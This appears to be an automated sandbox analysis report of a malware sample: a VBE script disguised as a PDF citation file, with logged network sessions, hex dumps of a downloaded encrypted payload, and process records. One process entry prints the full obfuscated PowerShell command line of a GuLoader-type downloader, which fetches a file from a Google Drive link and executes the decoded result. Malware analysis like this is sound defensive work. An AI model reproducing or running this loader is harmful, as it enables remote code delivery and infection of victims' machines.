                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.549805142.250.181.14438020C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-20 15:53:58 UTC258OUTGET /download?id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  2024-11-20 15:54:01 UTC4919INHTTP/1.1 200 OK
                                                                  Content-Type: application/octet-stream
                                                                  Content-Security-Policy: sandbox
                                                                  Content-Security-Policy: default-src 'none'
                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                  X-Content-Security-Policy: sandbox
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Resource-Policy: same-site
                                                                  X-Content-Type-Options: nosniff
                                                                  Content-Disposition: attachment; filename="NKbevViFuEGeFpIGnNn60.bin"
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Credentials: false
                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 493120
                                                                  Last-Modified: Wed, 20 Nov 2024 08:36:35 GMT
                                                                  X-GUploader-UploadID: AFiumC44eya3z_TP1HVWAGMp_Hv-6nryWZr91bzOt2rpW94wdbWw9_XDM9RodkYAsxNVQRpUXQ
                                                                  Date: Wed, 20 Nov 2024 15:54:00 GMT
                                                                  Expires: Wed, 20 Nov 2024 15:54:00 GMT
                                                                  Cache-Control: private, max-age=0
                                                                  X-Goog-Hash: crc32c=+2wIuw==
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2024-11-20 15:54:01 UTC4919INData Raw: a7 30 d7 9f 1e 83 7d 67 0b 13 e7 dd 73 69 ce 8f 61 96 db f0 46 f5 82 a2 8e 32 6e 88 60 f5 28 c5 ae 6f 02 8f 6a 5c 9d 97 93 22 68 a2 fb d6 71 a1 70 79 ba a7 d4 d4 3d 44 a4 61 15 d4 39 61 17 ce a5 36 ea 5a f4 4a af 06 88 bd 9f 8b 07 03 f6 07 c7 29 d3 02 b8 11 a6 81 92 58 f4 c4 1f cc 1a 77 6b 3f fc e4 17 e3 37 a3 13 52 70 1e c8 77 1a d9 8a fb d1 c4 1b 71 92 f3 36 0a d7 03 20 f5 87 93 54 65 bb 09 0e e9 17 1e 44 8d 42 93 18 85 c7 d1 42 45 41 09 67 ea 82 76 c2 24 21 41 0d d9 d1 ee fb 5b 82 25 10 ff 4d 42 39 8e 1d 39 fc 07 78 8b 5c 24 dc 6c 13 d5 79 8b c9 84 33 e1 f3 1b 0d 9c f3 5a 6a 79 6e c0 46 0d 1b fb b8 24 a1 56 cf 3b 90 65 2b 3f e8 64 68 01 d3 9c 50 f4 1f 63 24 13 ee 67 41 be 66 ea be bf 63 1d ec 96 1e 78 a1 de 3e 6a 26 51 70 39 0d cb 2f b7 88 bc 31 50 57
                                                                  Data Ascii: 0}gsiaF2n`(oj\"hqpy=Da9a6ZJ)Xwk?7Rpwq6 TeDBBEAgv$!A[%MB99x\$ly3ZjynF$V;e+?dhPc$gAfcx>j&Qp9/1PW
                                                                  2024-11-20 15:54:01 UTC4861INData Raw: 84 ec 9e b3 b9 ca 5b 9d 61 4f b2 4b ac cf 05 ca 2f 5a c5 61 9c c0 f4 40 71 c4 f7 30 c5 bd 2e eb 3b af ec 2a 67 be 6f b9 d7 87 99 f7 36 49 dc 94 f4 a9 38 3a b2 51 7b 4a 86 92 9e 96 61 2c 2e ce 42 c8 8d 3b 13 0b e0 ff 36 03 4b f5 fd 0a 42 28 00 67 11 3c 8e 8e 95 87 0f 3f 30 9c e4 95 a7 88 3b a4 69 7c 09 78 81 57 e5 83 22 cf e1 6a 70 bd 66 93 6c 3b c6 32 f3 b5 8e 02 9d 9f 0a ed 91 76 d5 5a ad 34 f0 5d ba 6b 1f 9e 50 6d 61 78 35 db 38 e6 e2 5e 52 2b 0a 53 a1 7d ff c9 ee a5 b5 36 ad 19 cb 83 fd d6 0e 9e 29 a7 45 1a c0 e4 08 cd dc 9b f8 5a ec 80 ac 47 36 fe 32 49 92 6c d4 78 f3 cc 14 0f 7f bf f5 cb ed 02 aa 1b 98 ea e7 11 9e ae 43 1e e2 45 f9 9d b0 69 27 a3 09 51 2e 6c 3d 79 27 d1 53 cd 01 f9 3d 95 b2 5f 8e 09 e2 47 9f 28 47 94 23 f6 a9 93 b8 ae f3 1c bc ed b1
                                                                  Data Ascii: [aOK/Za@q0.;*go6I8:Q{Ja,.B;6KB(g<?0;i|xW"jpfl;2vZ4]kPmax58^R+S}6)EZG62IlxCEi'Q.l=y'S=_G(G#
                                                                  2024-11-20 15:54:01 UTC1321INData Raw: 52 81 b5 94 74 cc 91 25 f3 7d fe 90 5f 12 56 58 94 4e 43 91 07 11 75 23 fa 30 9b 23 5b 8c 72 f1 56 d5 b7 c7 37 30 f1 c8 e1 93 3e a5 08 72 94 c4 1b 9e 0e be 0b 5e 72 0c 9f fe 9d 5a 54 bf e7 62 a1 16 e6 e5 ef eb bc 08 c7 5d 51 bd 49 c3 3d c3 68 1e f4 46 50 c3 4d 82 ad 13 7a 03 72 3c bf 7a 2f 25 ff 82 86 3c ae 34 cc 01 8f c9 1b 3b 9d 71 6d 0e 84 fb ad 56 d7 6b 8c b0 5a 09 cf a8 f5 bc 27 5a fa 1c 2a 1f 6f 1f 68 e3 10 e8 fa f9 d5 1c e8 9f c1 c2 22 9d 15 46 23 5a da 1c 98 98 05 49 c3 2e c0 dd 9a b2 88 62 82 d4 95 47 86 bf 28 4d c0 ac 87 b8 8d dd 31 97 c4 f1 fb e4 e1 1b 1d 79 e7 ed 03 ad 5f da 34 5d c2 7b a4 e5 ef 08 16 ca da 01 1a db 0c 69 ae ee 91 bb b9 c1 63 da 65 8f 71 65 6b ef 76 be 4e 60 ce d9 0e 1e bd 52 26 46 01 07 52 64 88 34 51 26 fd 27 79 c2 51 3f cc
                                                                  Data Ascii: Rt%}_VXNCu#0#[rV70>r^rZTb]QI=hFPMzr<z/%<4;qmVkZ'Z*oh"F#ZI.bG(M1y_4]{iceqekvN`R&FRd4Q&'yQ?
                                                                  2024-11-20 15:54:01 UTC1390INData Raw: b2 e9 bc 96 d3 cc 8b c0 29 f2 be a7 18 de e8 dd 28 88 3c 3e 68 33 58 91 07 9d bd 83 b9 2d 0d 7d 2d 75 dc 4d db 4a e7 29 b0 8f 6b 98 4f cc c3 f8 e2 82 ef 5d 4d 9d 7f 85 da 9d ee 4e 17 3d 06 d2 c0 ae a6 88 fb 2e ad 0a 4c 39 27 c7 b8 86 83 fb 7a 65 50 16 b0 63 95 45 98 2a d2 e2 b4 2c a7 20 bc 0a d4 be 6f 0c 0d a3 48 27 5f a0 01 09 6b 4b 11 94 38 63 5c ff 17 19 b8 c7 c2 5f 47 12 e9 b0 84 aa 14 e3 bd b0 cb 7f 1d ca fc 86 aa 74 49 72 2b 46 63 ce 96 22 06 c0 1e 87 8f 46 d5 d1 91 f8 d5 5e 1e 89 29 e0 93 4b 1f a7 43 6b c0 32 2d e0 60 5d 10 e9 b1 fd 49 73 2f 69 1b a0 69 fd fd 07 19 8d 49 d7 3b c7 89 03 6e a2 17 78 82 7b 43 f1 a5 32 3e 65 0a bd d7 09 04 51 7d fb 9c a4 c8 fe 3e ab c0 e6 35 88 11 e5 82 d1 84 f9 8d f5 31 90 27 07 9f 0b 34 5b 7b 24 9d bb fb 46 8c 45 88
                                                                  Data Ascii: )(<>h3X-}-uMJ)kO]MN=.L9'zePcE*, oH'_kK8c\_GtIr+Fc"F^)KCk2-`]Is/iiI;nx{C2>eQ}>51'4[{$FE
                                                                  2024-11-20 15:54:01 UTC1390INData Raw: c3 54 a9 ae 85 92 7a 7c 93 46 ab 3e 0d 9b b9 bc bc e2 89 82 7f fd bd 2e 00 ac 4a 25 e3 20 81 74 11 f4 15 db dc 6a a1 a3 f9 fd ed d2 fb ca 22 59 74 29 df 36 f2 9e 83 13 d9 da 83 d1 97 e1 cc e1 41 0e 63 db 64 f8 23 96 ea 47 f1 5b 26 bd a7 e4 89 e8 b0 63 8d 99 3a 8c 10 c3 d6 09 de 5c 3f e4 5e b8 bf ff 3a e6 fc ab b2 e1 e9 e6 c5 75 1f ce 04 f0 68 ee 89 46 7f 4e f4 39 bc a7 17 e7 16 7e e3 71 47 09 0b 2e 9f 8b f8 af a0 8c b0 c1 19 e1 47 ee 2d 59 59 97 a1 4f 5c d8 93 33 4f 27 14 c3 f8 1c c8 28 dc d9 80 f6 78 94 e5 26 07 b5 d0 4d 5f 55 82 a2 bd c2 3f c4 d9 0b 78 6c 2e 5e 25 8e 4a 79 3e 86 ec 5e 53 56 a6 b0 6c cd 0f 12 89 09 cd 7a 1a 5d f3 a1 9d dc 93 48 34 c5 ab 6f 63 b8 38 ff 2d a7 55 c3 63 59 e8 b7 18 43 ac a2 47 f6 b6 9c 50 9d 64 87 d8 f8 7e 5f 29 80 5f 20 35
                                                                  Data Ascii: Tz|F>.J% tj"Yt)6Acd#G[&c:\?^:uhFN9~qG.G-YYO\3O'(x&M_U?xl.^%Jy>^SVlz]H4oc8-UcYCGPd~_)_ 5
                                                                  2024-11-20 15:54:01 UTC1390INData Raw: 90 fc e9 06 9b bd dd d6 88 1b 3a d7 a9 c0 fb 02 59 16 a6 9a db 02 37 33 28 4e e3 af 3c 3f 03 85 6d f9 67 1a 4c 1f 4d f2 62 39 8b 72 3f aa 26 a7 03 b1 78 72 83 69 f7 42 3f 88 b5 8b f7 93 0c ef f0 8d 04 4e cd c6 7c 69 d9 ee fa 6d 7d d4 4c a4 0e 8e fd 92 8f bb df 8e d7 f4 e8 58 c1 99 0c 9b 61 8a 56 c4 c3 19 45 59 76 4c a8 fc 96 a3 3b f1 1c 7d 3c db 6f ca 20 c0 24 28 91 24 2d 08 eb 4e d4 07 62 cc c9 7f ee 01 d7 4b 6e 4d 37 46 56 b4 7e 25 9b 0a 87 2e 8d eb 1f ac 57 d7 8d c9 f1 ea 19 7b 00 94 e5 c2 f0 6d 6e 9c 38 31 5b d1 2e cb 83 54 a2 c1 e2 e0 03 5b c5 a7 e1 7b f5 b0 80 26 09 45 cd 6d dc 2c b0 7a 36 96 f4 fd c0 59 5a 4b 23 44 a4 51 15 06 18 42 64 b1 5e 83 c1 d5 fc d5 bb ca dd c5 2f 26 c1 44 9a 54 0d 6a 7c a7 66 0b 41 2d a8 62 fc 29 c6 ab aa 70 f4 3b 1c 77 f9
                                                                  Data Ascii: :Y73(N<?mgLMb9r?&xriB?N|im}LXaVEYvL;}<o $($-NbKnM7FV~%.W{mn81[.T[{&Em,z6YZK#DQBd^/&DTj|fA-b)p;w
                                                                  2024-11-20 15:54:01 UTC1390INData Raw: d7 4c ab e4 36 76 df 93 33 ed 95 6b 11 3b 7f f7 c4 ab 6b 59 25 2b 45 f5 40 07 5d b0 bb bd 34 7b 31 e3 6e a3 6e bf ff ef ef 4f ed 04 fd 0e 24 02 05 0d 30 cb 2e 1f ea e0 17 5c 69 cd ff f6 17 60 ff 06 a6 4e fc 57 1e 42 9b 06 0e b9 bd 76 45 cb 82 ea 90 fd 6d 3e ab 0a 3e f0 87 ea 44 e1 6c 73 c3 8f 5a 9f 82 c8 7b f2 4f 1a dc 95 ff 25 32 60 36 ac 30 84 58 e9 5a 2b 6f 96 3e f4 44 2d 36 86 26 20 19 74 89 1c 6c 44 76 10 dc 94 35 32 7e 27 ee d1 16 f7 8f 55 95 12 d4 7b c3 f5 25 8d d7 31 77 1a bd 84 23 f9 ae e4 9b d4 12 a4 eb d3 8d a3 1b f8 99 f3 20 5c 2d 2e 0f 4d 4e d5 57 20 44 45 e9 7c 4c 33 01 0c eb cf ac 70 46 3e 7c aa 8a 25 19 33 9c 48 6e 7d 72 0a cd 61 31 e8 0a 95 1b 21 80 5f a2 1e 23 26 d6 75 de a7 67 d5 77 23 82 44 91 83 c8 37 98 4b 31 94 e7 b5 45 77 25 fe 59
                                                                  Data Ascii: L6v3k;kY%+E@]4{1nnO$0.\i`NWBvEm>>DlsZ{O%2`60XZ+o>D-6& tlDv52~'U{%1w# \-.MNW DE|L3pF>|%3Hn}ra1!_#&ugw#D7K1Ew%Y
                                                                  2024-11-20 15:54:01 UTC1390INData Raw: 5a b8 f7 4e 83 df e8 22 59 07 77 29 7a 3b 16 12 18 a4 5e 7f cf d6 4f ef a1 28 37 ea da ca 12 dd b5 f8 fc 7b e7 b3 1d fd 9e 93 bf 06 b8 dd 83 61 e2 e7 b6 38 5f a6 bc af ba 01 9d 64 b5 2f 84 8d 7e 82 d1 a1 b3 00 5f d2 92 11 34 d4 b2 85 9b dc e8 04 8a 84 9d 4b 8f d1 b5 ae 2d e6 70 17 51 e8 03 5e 95 f8 86 1c 66 e0 19 c1 1d c9 6e 59 15 0d 96 46 dd bb b8 e7 3f 14 f3 37 8f f0 de 18 f5 ca 5d 9a cd 83 b6 2b dc 1c dd ff 33 5f 69 6f 05 f1 4b 36 06 6c b5 2f 33 00 1b f6 91 59 5d f3 a2 93 b1 7e 89 bf f9 b4 7a e7 b5 dc 82 aa 5e 45 fe 0d 82 4d 4d b2 ec 53 92 a8 4c 71 75 88 37 45 74 a2 d8 02 87 49 f2 39 ad 7f 8d b9 d8 14 a9 a8 ee 94 36 29 1a d2 b0 2f 37 d0 73 07 36 cc 0f 7f 0f 94 04 4c cc 50 ef d0 4b 3e e4 23 1a 46 c3 b4 83 16 75 8b 81 0f c7 de 7a 06 28 93 b4 ca 27 90 bf
                                                                  Data Ascii: ZN"Yw)z;^O(7{a8_d/~_4K-pQ^fnYF?7]+3_ioK6l/3Y]~z^EMMSLqu7EtI96)/7s6LPK>#Fuz('
                                                                  2024-11-20 15:54:01 UTC1390INData Raw: f2 a4 a3 b1 62 4c a7 8e 43 4b 3d a6 50 3d 54 94 14 53 2a 29 e4 fa 76 0c db aa 12 4a 03 81 7f 07 f4 ca 16 cd 00 ba 84 c0 04 72 f2 b5 34 9f ee 26 f4 87 04 e9 81 1d 82 85 10 65 86 d5 20 a1 1e 0f 3b 0c 50 80 e3 9b 31 bb 16 2c ec a5 a1 76 7b 8e af ed a1 5f db 6c 52 eb 87 fe 99 74 e0 5e b1 38 18 92 17 74 5e bc af 3d 64 03 0a 65 7c a9 a6 c1 64 7f 6e 72 6c 74 3b 0f da fe 37 79 65 3b ca 5a 16 6b 5c 16 f9 86 2c 4b 4f a0 43 ec 6b 3b 6f 59 e9 03 8e 36 01 19 27 a8 68 79 4c 78 2f eb ab 51 96 fb f1 fd 40 83 ce 73 ea d8 16 36 8c 9e 7b 5c bd 70 a4 15 db 71 69 a1 a3 ca c6 df 82 fa 4f 2a b1 42 8a ab 38 2e 59 eb 0f 42 c2 92 06 5c 1e 63 5c 56 b8 c9 27 3d f1 15 c0 3d 10 00 4f c4 b5 8d a2 c1 72 27 43 fc d7 b1 95 ad c5 c1 33 44 c1 79 e4 ea 21 67 e8 e9 4e 53 df f7 f9 09 a0 3f b7
                                                                  Data Ascii: bLCK=P=TS*)vJr4&e ;P1,v{_lRt^8t^=de|dnrlt;7ye;Zk\,KOCk;oY6'hyLx/Q@s6{\pqiO*B8.YB\c\V'==Or'C3Dy!gNS?
                                                                  2024-11-20 15:54:01 UTC1390INData Raw: b3 09 06 16 69 e0 91 62 58 59 38 32 98 35 d0 e7 4a d0 59 1c d3 2b 7a df 37 45 2a 99 8c bd 9f 74 8c d8 e2 8a 33 0d ef 54 50 b9 61 7e 2d 08 79 88 3b e8 f2 70 ac c0 03 69 5b c7 0f 4b ea 94 8f e1 f1 69 64 a3 01 87 f5 dc 96 1f 8a 78 63 0a 5a 8f 0c 74 87 93 5a 12 71 52 48 5d f6 be 3e 34 43 54 05 29 df 9d 47 de 2c 2f 14 85 b5 8f 74 c4 4d 06 34 5f 21 85 8f 7b b9 cb e0 00 74 08 25 0f c0 1d b8 48 72 fb ba 84 50 ba fb 27 8b 0c a1 a0 0b 09 56 dd f2 63 82 3f f9 8d 3e 14 59 05 5c 3e 2d f7 71 f6 85 0a 63 4e 8e 44 67 ac b1 f6 df a0 ca c6 f3 d4 be 69 8f ab 51 57 bc 33 ec 34 f6 31 e7 89 b5 60 7b 29 41 0f 7c 82 ea fa 1b 6c 2d 30 92 b5 48 f3 82 6c 1a 10 ce 01 6a 50 07 a5 e5 ce a2 8f b8 a3 e0 7d 4a 07 34 a9 4b 7c 54 a3 ed e8 5d c8 9e 27 e2 e6 06 84 f3 c8 07 b5 19 a0 2d 51 7c
                                                                  Data Ascii: ibXY825JY+z7E*t3TPa~-y;pi[KidxcZtZqRH]>4CT)G,/tM4_!{t%HrP'Vc?>Y\>-qcNDgiQW341`{)A|l-0HljP}J4K|T]'-Q|


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:10:53:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe"
                                                                  Imagebase:0x7ff70ea80000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:10:53:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;"
                                                                  Imagebase:0x7ff7be880000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:10:53:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:10:53:34
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
